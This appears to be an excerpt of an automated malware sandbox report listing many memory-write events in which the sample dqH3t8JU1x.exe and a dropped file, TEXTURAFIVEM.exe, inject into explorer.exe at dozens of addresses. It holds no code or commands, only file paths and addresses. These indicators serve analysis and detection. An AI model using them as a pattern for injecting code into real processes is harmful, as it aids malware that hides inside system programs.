            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7600000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7A50000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7A80000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 79C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7CE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7D20000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7D70000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7DB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7E00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7EC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7F00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: A940000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: A970000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: D230000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: D270000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E130000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E170000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E530000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E570000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E6B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E6F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E730000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E770000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E7B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E7F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E830000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: E870000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EA30000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EA70000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EAB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EAF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EB30000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EC00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EBB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EB90000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: EC60000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F080000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F0E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F520000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F070000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: ECF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 2980000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FAC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FB00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FB10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: AA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F0B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FBB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FC30000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FCD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FD10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F030000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FD50000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: FD90000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F560000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F5A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F5E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F620000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F660000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F6A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F6E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F720000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F760000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F7A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F7E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F820000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: F860000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 29A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4DE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4E10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4E50000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4E90000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4EC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7230000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7260000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7290000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 72C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 72F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: AEC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: AE60000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: AE90000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: AED0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: AF00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: B0A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 24010000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: B0F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: B120000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3330000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3340000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3350000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 33E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 33F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3600000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3610000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3620000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3630000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3640000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3650000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3660000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3670000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3680000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3690000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B20000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B30000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B40000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B50000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B60000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B70000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B80000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B90000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3C00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3C10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3C20000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5400000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5410000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5450000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5460000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5470000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5480000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5490000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5500000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5510000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5600000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5610000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5700000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5710000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5800000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5810000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5900000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5910000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5B00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5B10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5C00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5C10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5D00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5D10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5E00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5E10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5ED0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 24080000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5F00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5F10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: D60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: D70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: D80000Jump to behavior
